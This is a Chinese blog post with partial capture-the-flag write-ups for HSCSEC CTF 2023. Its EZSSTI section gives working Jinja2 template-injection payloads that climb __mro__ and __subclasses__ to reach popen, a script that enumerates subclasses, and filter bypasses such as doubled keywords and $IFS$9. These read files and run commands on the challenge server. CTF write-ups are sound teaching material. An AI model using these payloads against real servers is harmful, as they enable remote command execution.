首页 > 其他分享 >HSCSEC CTF 2023部分WP

HSCSEC CTF 2023部分WP

时间:2023-02-12 16:37:31浏览次数:65  
标签:__ .__ name HSCSEC CTF mro WP subclasses class

EZSSTI

?name={{''.__class__.__mro__[-1].__subclasses__()}}
查看所有子类

from requests import *
for i in range(300):
    url="http://4dcc7f0f-0e07-49e1-b2c8-b9ce9de9c125.race-node.hscsec.cn:8080/?name={{[].__class__.__mro__[-1].__subclasses__()[%s]}}"%i
    m=get(url)
    print(f"{i}:{m.text}")

image
找到这个类
?name={{''.class.mro[-1].subclasses()[132].init.globals.popen('ls /').read()}}
发现报错,猜测是把popen替换成空,后面测试发现不能有空格
?name={{''.class.mro[-1].subclasses()[132].init.globals.poppopenen('ls /').read()}}
?name={{''.class.mro[-1].subclasses()[132].init.globals.ppopenopen('cat$IFS$9/flaflagg').read()}}

EASYPHY

image
发现这个页面,有点像是文件包含,再加上后面的文件上传后缀没办法绕过,基本就是了
system那一系列传不上去,
image
然后文件包含一下即可

EZSYFLASK

tips

标签:__,.__,name,HSCSEC,CTF,mro,WP,subclasses,class
From: https://www.cnblogs.com/V3g3t4ble/p/17114004.html

相关文章

  • WPF简单自动更新(升级)程序+服务端
    工作逻辑是用户启动主程序,主程序启动更新程序,更新程序立刻检查是否有已经下载好的更新包,如果有则立刻关闭主程序进行更新,如果没有则访问服务器查询更新包,并在后台静默下载,......
  • WPF数据绑定机制是如何实现 转载
    转载自https://blog.51cto.com/u_15127553/4275829 接触MVVM模式也有一段时间了,这种将前后台分离开了的设计模式一下子就吸引了我,也是当时一直有一个问题困扰了我很久:WP......
  • 《植物大战僵尸》 辅助编写5—— 编写wpf游戏辅助
    这里一开始用了Pinvoke.net,后来发现它的WriteProcessMemory接口和win32APi里的WriteProcessMemory不太一样。就抄了一个其他的。internalpartialclassCheatCore......
  • 【WPF】记录一些控件的实现
    1.流动路径可以通过Path来定义路线,虚线从起点流向终点<UserControl.Resources><Storyboardx:Key="OnLoaded1"x:Name="_Storyboard"><DoubleAnimationUs......
  • 界面组件Telerik UI for WPF R1 2023——让导航栏变得更智能!
    TelerikUIforWPF拥有超过100个控件来创建美观、高性能的桌面应用程序,同时还能快速构建企业级办公WPF应用程序。UIforWPF支持MVVM、触摸等,创建的应用程序可靠且结构良......
  • Asp.net: sometimes OutOfMemoryException when many w3wp processes run
    Asp.net:sometimesOutOfMemoryExceptionwhenmanyw3wpprocessesrunAskQuestionAsked 4years,11monthsagoModified 4years,11monthsagoIhaveani......
  • WPF常用UI库和图表库(MahApps、HandyControl、LiveCharts)
    WPF常用UI库和图标库(MahApps、HandyControl、LiveCharts)WPF有很多开源免费的UI库,本文主要介绍常见的MahApps、HandyControl两个UI库;在开发过程中经常会涉及到图表的开发,本......
  • iwpriv命令用法+wireless-tools源码和编译
    【MTK】iwpriv命令说明https://www.cnblogs.com/code1992/p/14265893.htmlIwpriv工作流程及常用命令使用https://zhuanlan.zhihu.com/p/24705116wireless-tools源码分析-i......
  • WPF使用PATH来画圆
    WPF使用Path来画圆,在WPF中可以使用Path(路径)来画圆,而Path支持两种写法:xaml代码格式、标记格式,这里介绍的是标记格式:例子:<PathData="M300,300A100,1000......
  • 一款WPF开发的B站视频下载开源项目
    更多开源项目请查看:一个专注推荐优秀.Net开源项目的榜单今天给推荐一款C#开发的、界面简洁的哔哩哔哩视频下载工具。项目简介这是一款基于WPF开发的,B站下载工具,操作界......